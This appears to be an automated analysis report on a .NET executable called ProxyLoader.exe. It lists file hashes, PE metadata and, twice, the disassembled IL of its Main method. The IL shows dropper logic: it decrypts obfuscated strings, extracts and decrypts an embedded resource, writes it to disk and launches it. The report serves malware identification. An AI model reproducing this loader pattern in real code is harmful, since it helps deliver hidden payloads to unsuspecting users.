780797d9ab0c3bceb7d50a30fc3de50e
PE Executable | MD5: 780797d9ab0c3bceb7d50a30fc3de50e | Size: 1.77 MB | application/x-dosexec
|
Hash | Hash Value |
|---|---|
| MD5 | 780797d9ab0c3bceb7d50a30fc3de50e
|
| Sha1 | ca6d3865d17265d94ff4af4f7851650244ae34bc
|
| Sha256 | 4a5598e056a1f35b8638a606f9870ad2f05f00bd38076e5cf66fc99cb6309b19
|
| Sha384 | 315306af686efa30f17710bb4714d81fef741f2dd103cdbda70f51d0e734826194645ffbe6362e453f71da6a451a53f1
|
| Sha512 | bfa241ba7c76aaddd795c46dc6076e452b740e081dea99d1506940e3867f4cbfe6f37e7487773076631c2abc0ecda7be275573de54afa3c6db18232a66d25b00
|
| SSDeep | 49152:jLomO28nxkWIAbETHa1hGVr3L/9+WORpbsBLn5FRWTe/Iel:GlnxHHbETHa123L1+/sBzRWL
|
| TLSH | 6585332465C83D86E8213B3544B33283953F89B66A3C6A5ED86F85862CF5487F345B3F
|
PeID
|
Name0 | Value |
|---|---|
| Module Name | ProxyLoader.exe |
| Full Name | ProxyLoader.exe |
| EntryPoint | System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::Main() |
| Scope Name | ProxyLoader.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | ProxyLoader |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 17 |
| Main Method | System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::Main() |
| Main IL Instruction Count | 121 |
| Main IL | ldstr Fbpro4QbsCX1qPzlvmhvV0tuDNXOD6kdhDotQ9SAdBtJeb82Ffn0hQPFNDIvaM+OP4aW5cLfwlJYn1vjMavxTHkGOwhwX4L5WjeL+dBixYbSLTay6+2kgo+uPSexvOTXoiwz6GhPv52QUG0WQLnN/rqkzoAzpXKXyusL0ngaSphiMPYgDxW68gOZUnb/2l+0QxCV/WXEzHPwxsCilOzHTl375huSejJpMbgjRlW7SACQrg3TpPaGfrPxSjTi54SOr5p8SA/O9fYFVRH3Y4dGCf5GJb3VjIuDLKzu2/vn6ONho5Jr9uaMb2kbOmYp8zbXjnGtiKn202F8BdOsEx/MWnWz7hXlrR5w7nQ2kJHqj9CEqgLnmBF8FOhjAIQuvagEdi1fySOqYzwTQrN2dmT9lwmNA7sZl2JLiIaVpnGduvrJsC8EiTXnYVjC3GxdlSjIr6atZYt3WrW/eaKRgl37MnU99qJkMuYES8WBxmDxRU6DEeGb+w/zc1VSiOu6LZoMIKwEVhJkIU5g2Ulm9WZQd9kZlG+jSmse/sOBjNwhUZ4= call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::bmhyyvcezyxkftihybssx(System.String) ldstr Fbpro4QbsCX1qPzlvmhvVwYDDJY1aQaYZc0tcWVbbQcQGEPaJHfu2FDPjtWmOLmSuXZQGxzIuxjSZYVPxZMG+4avuiEM7qLNzZFB29AeqbQaSfC+ZT4czrQwBRwRFEQ9vnAKLTCp6lncaHrQZ40vx+1bTsib8EHcDKzV8Z/Aj+r7l3r94gTVlF3m6rHvbMkWmiNcnJjjkarDcS0gFW486ObtqW/SHRXKSLaSly+csog8SPYgus345pp4QIFS7A0efYruR0OcwWmwR67jdJiteb93AMs28PAz4Z6DG4ug/UmGGPxLpvxgctPEQR9zZxul6hGwLogDnTDKGeJCVn4IuFyfqk0xK60bj+nLIn0QoiU7Ea2lxJN1wkdpaaaUmnd45U7trq+HBatw0JNlB6VJFA== call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::bmhyyvcezyxkftihybssx(System.String) ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr OAh1TqGPrxdw9dGEgUgHgA== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr nQMIlOQWEV15Z5j7lVNosA== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr fajfsnlatncgjxjd stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr DoIcVP/7iyeoKQMwXIoiuA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr YdlCyJJwoADl8LRPTuaU9A== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr 1FNZRlhs7uaGuwIVkkMLaaMs327CXxK45/rYRk1ugV8= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr umleejfzxbrsfzrr stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr DoIcVP/7iyeoKQMwXIoiuA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr cabbghccteuephas call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_0119: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr OIjmZTO0oBZqDu8tFMta0haiTFUwFvk37E4qyyxfi+Y= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00C3: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00C8: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::rbycwmaqpflldausljeskikcyyep(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) ldstr DoIcVP/7iyeoKQMwXIoiuA== call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0115: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt.s IL_00A1: ldloc.0 ret <null> |
| Module Name | ProxyLoader.exe |
| Full Name | ProxyLoader.exe |
| EntryPoint | System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::Main() |
| Scope Name | ProxyLoader.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | ProxyLoader |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 17 |
| Main Method | System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::Main() |
| Main IL Instruction Count | 121 |
| Main IL | ldstr Fbpro4QbsCX1qPzlvmhvV0tuDNXOD6kdhDotQ9SAdBtJeb82Ffn0hQPFNDIvaM+OP4aW5cLfwlJYn1vjMavxTHkGOwhwX4L5WjeL+dBixYbSLTay6+2kgo+uPSexvOTXoiwz6GhPv52QUG0WQLnN/rqkzoAzpXKXyusL0ngaSphiMPYgDxW68gOZUnb/2l+0QxCV/WXEzHPwxsCilOzHTl375huSejJpMbgjRlW7SACQrg3TpPaGfrPxSjTi54SOr5p8SA/O9fYFVRH3Y4dGCf5GJb3VjIuDLKzu2/vn6ONho5Jr9uaMb2kbOmYp8zbXjnGtiKn202F8BdOsEx/MWnWz7hXlrR5w7nQ2kJHqj9CEqgLnmBF8FOhjAIQuvagEdi1fySOqYzwTQrN2dmT9lwmNA7sZl2JLiIaVpnGduvrJsC8EiTXnYVjC3GxdlSjIr6atZYt3WrW/eaKRgl37MnU99qJkMuYES8WBxmDxRU6DEeGb+w/zc1VSiOu6LZoMIKwEVhJkIU5g2Ulm9WZQd9kZlG+jSmse/sOBjNwhUZ4= call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::bmhyyvcezyxkftihybssx(System.String) ldstr Fbpro4QbsCX1qPzlvmhvVwYDDJY1aQaYZc0tcWVbbQcQGEPaJHfu2FDPjtWmOLmSuXZQGxzIuxjSZYVPxZMG+4avuiEM7qLNzZFB29AeqbQaSfC+ZT4czrQwBRwRFEQ9vnAKLTCp6lncaHrQZ40vx+1bTsib8EHcDKzV8Z/Aj+r7l3r94gTVlF3m6rHvbMkWmiNcnJjjkarDcS0gFW486ObtqW/SHRXKSLaSly+csog8SPYgus345pp4QIFS7A0efYruR0OcwWmwR67jdJiteb93AMs28PAz4Z6DG4ug/UmGGPxLpvxgctPEQR9zZxul6hGwLogDnTDKGeJCVn4IuFyfqk0xK60bj+nLIn0QoiU7Ea2lxJN1wkdpaaaUmnd45U7trq+HBatw0JNlB6VJFA== call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Void avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::bmhyyvcezyxkftihybssx(System.String) ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr OAh1TqGPrxdw9dGEgUgHgA== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr nQMIlOQWEV15Z5j7lVNosA== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr fajfsnlatncgjxjd stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr DoIcVP/7iyeoKQMwXIoiuA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr YdlCyJJwoADl8LRPTuaU9A== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr 1FNZRlhs7uaGuwIVkkMLaaMs327CXxK45/rYRk1ugV8= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr umleejfzxbrsfzrr stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr DoIcVP/7iyeoKQMwXIoiuA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr cabbghccteuephas call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_0119: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr OIjmZTO0oBZqDu8tFMta0haiTFUwFvk37E4qyyxfi+Y= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00C3: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00C8: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::rbycwmaqpflldausljeskikcyyep(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) ldstr DoIcVP/7iyeoKQMwXIoiuA== call System.String avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb.avjqsulrzkrzkpkgswzcabhgxjvkkpsuphcfpb::ssqfrjjdbceifwidexljjgtwublle(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0115: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt.s IL_00A1: ldloc.0 ret <null> |
|
Name0 | Value |
|---|---|
| Embedded Resources | 1 |
| Suspicious Type Names (1-2 chars) | 0 |
|
Name0 | Value | Location |
|---|---|---|
| Embedded Resources | 1 |
780797d9ab0c3bceb7d50a30fc3de50e |
| Suspicious Type Names (1-2 chars) | 0 |
780797d9ab0c3bceb7d50a30fc3de50e |